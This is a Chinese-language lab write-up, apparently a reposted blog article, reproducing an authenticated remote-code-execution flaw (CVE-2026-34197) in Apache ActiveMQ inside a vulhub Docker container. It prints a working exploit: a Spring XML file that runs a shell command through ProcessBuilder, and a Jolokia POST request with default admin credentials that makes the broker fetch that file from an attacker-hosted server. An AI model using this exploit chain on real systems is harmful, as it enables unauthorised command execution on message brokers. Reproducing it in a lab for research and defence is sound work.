文章总结: 本文详细复现了ApacheActiveMQCVE-2026-34197远程代码执行漏洞,该漏洞影响5.19.4之前版本及6.0.0-6.2.2版本。攻击者通过构造包含恶意SpringXML配置的vm://传输URL,结合Jolokia接口实现认证后RCE。文档提供了完整的Docker环境搭建、POC.xml文件编写、BurpSuite攻击配置及结果验证步骤,成功演示了命令执行过程。 综合评分: 65 文章分类: 漏洞分析,实战经验,WEB安全,安全工具,渗透测试
CVE复现 | CVE-2026-34197漏洞复现
原创
LRT凌日 LRT凌日
凌日网络与信息安全团队LapR1skT
2026年6月10日 12:00 重庆
在小说阅读器读本章
去阅读
漏洞逻辑
该漏洞是Apache ActiveMQ 5.19.4版本之前以及6.0.0至6.2.3版本之前存在的一个远程代码执行漏洞。攻击者通过构造精心的vm://传输url,其中包含控制springXML配置文件的参数,当ActiveMQ处理url时,会获取并解析远程XML配置文件,从而执行任意代码。 Tip:由于这个漏洞是和CVE-2024-32114(未授权访问)共同组成RCE,但是CVE-2026-34197是一个认证后的漏洞,所以后续直接使用默认的admin/admin进行攻击
受影响的ActiveMQ版本
所有 5.0 ~ 5.19.3 全部受影响(版本<5.19.4)
1. < 6.0.0 ~ 6.2.2
环境配置
我这里使用的是vulhub中的CVE-2026-34197的docker-compose.yml文件
1. docker-compose.yaml
2. services:
3. activemq:
4. image: vulhub/activemq:6.2.2
5. ports:
6. "61616:61616"
7. "8161:8161"
8. "5005:5005"
搭建镜像
cd到存放CVE-2026-34197文件夹的地址打开终端,执行命令
1. docker compose up -d
漏洞验证
01
等待拉取成功进入Apache ActiveMQ
02
创建poc.xml文件并在该目录下启动python HTTP服务器
poc.xml
1. <?xml version="1.0" encoding="UTF-8"?>
2. <beansxmlns="http://www.springframework.org/schema/beans"
3. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4. xsi:schemaLocation="http://www.springframework.org/schema/beans
5. http://www.springframework.org/schema/beans/spring-beans.xsd">
6. <beanid="exec"class="java.lang.ProcessBuilder"init-method="start">
7. <constructor-arg>
8. <list>
9. <value>bash</value>
10. <value>-c</value>
11. <value><![CDATA[id > /tmp/success]]></value>
12. </list>
13. </constructor-arg>
14. </bean>
15. </beans>
启动服务器端口为8000
python -m http.server 8000
03
BP抓包修改发包内容
修改后的内容为(不要使用校园网)
1. POST /api/jolokia/ HTTP/1.1
2. Host: localhost:8161
3. Content-Type: application/json
4. Authorization:BasicYWRtaW46YWRtaW4=
5. Content-Length:237
6. {
7. "type":"exec",
8. "mbean":"org.apache.activemq:type=Broker,brokerName=localhost",
9. "operation":"addNetworkConnector(java.lang.String)",
10. "arguments":["static:(vm://evil?brokerConfig=xbean:http://YOUR-IP:8000/poc.xml)"]
11. }
04
查看HTTP Server状态以及验证文件是否写入
由上图可知我们的poc.xml文件也是成功被执行,之后我们可以选择打开docker容器查看success文件是否被写入,也可以在命令行查看
输入docker compose exec activemq cat /tmp/success
docker容器内部查询
success写入成功,复现成功
参考文章
https://blog.csdn.net/weixin_55992263/article/details/160800132
https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2026-34197/README.zh-cn.md
vulhub
源文件:https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2026-34197
免责声明:由于传播、利用本公众号凌日网络与信息安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号凌日网络与信息安全团队及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:凌日网络与信息安全团队LapR1skT LRT凌日 LRT凌日《CVE复现 | CVE-2026-34197漏洞复现》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论